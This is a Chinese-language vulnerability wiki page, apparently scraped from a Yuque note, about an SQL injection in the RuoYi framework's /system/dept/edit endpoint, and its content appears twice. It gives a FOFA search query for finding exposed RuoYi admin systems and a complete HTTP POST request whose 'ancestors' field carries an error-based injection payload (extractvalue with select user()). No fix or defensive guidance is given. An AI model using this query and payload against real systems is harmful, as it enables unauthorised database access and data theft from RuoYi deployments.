fofamini-wiki

登录白背景

源码

若依快速开发框架edit存在sql注入漏洞

一、漏洞简介

ruoyi是一套基于java开发的轻量级开源快速开发框架，采用Spring Boot+Spring Security+MybatisPlus框架技术。ruoyi框架内部采用分模块设计，代码清晰简单易于维护，同时提供多种组件，如代码生成、前后端分离、数据权限管理等，可以快速开发出完整的项目。若依快速开发框架edit存在sql注入漏洞

二、影响版本

ruoyi

三、资产测绘

app="若依-管理系统"

四、漏洞复现

POST /system/dept/edit HTTP/1.1
Cookie: b-user-id=3fb562ab-372b-aaaf-344c-b2749df5a18e; JSESSIONID=0c074950-06a0-4f68-b7d5-9d1bc33d22bf
Host: 
Content-Length: 179
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36

DeptName=1&DeptId=100&ParentId=12&Status=0&OrderNum=1&ancestors=0)or(extractvalue(1,concat((select user()))));#

原文: https://www.yuque.com/xiaokp7/ocvun2/kpulg661z3upfnf5

# 若依快速开发框架edit存在sql注入漏洞

# 一、漏洞简介
ruoyi是一套基于java开发的轻量级开源快速开发框架，采用Spring Boot+Spring Security+MybatisPlus框架技术。ruoyi框架内部采用分模块设计，代码清晰简单易于维护，同时提供多种组件，如代码生成、前后端分离、数据权限管理等，可以快速开发出完整的项目。若依快速开发框架edit存在sql注入漏洞

# 二、影响版本
+ ruoyi

# 三、资产测绘
```plain
app="若依-管理系统"
```

![1721639324402-8114ae2f-0e23-4dff-b4a8-c3e488a0f08f.png](./img/6wG3fbCEerIo7t9T/1721639324402-8114ae2f-0e23-4dff-b4a8-c3e488a0f08f-238149.png)

# 四、漏洞复现
```http
POST /system/dept/edit HTTP/1.1
Cookie: b-user-id=3fb562ab-372b-aaaf-344c-b2749df5a18e; JSESSIONID=0c074950-06a0-4f68-b7d5-9d1bc33d22bf
Host: 
Content-Length: 179
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36

DeptName=1&DeptId=100&ParentId=12&Status=0&OrderNum=1&ancestors=0)or(extractvalue(1,concat((select user()))));#
```

![1721641920739-e19de8c7-e28d-4ac2-9c10-538e88f3d6a3.png](./img/6wG3fbCEerIo7t9T/1721641920739-e19de8c7-e28d-4ac2-9c10-538e88f3d6a3-643031.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kpulg661z3upfnf5>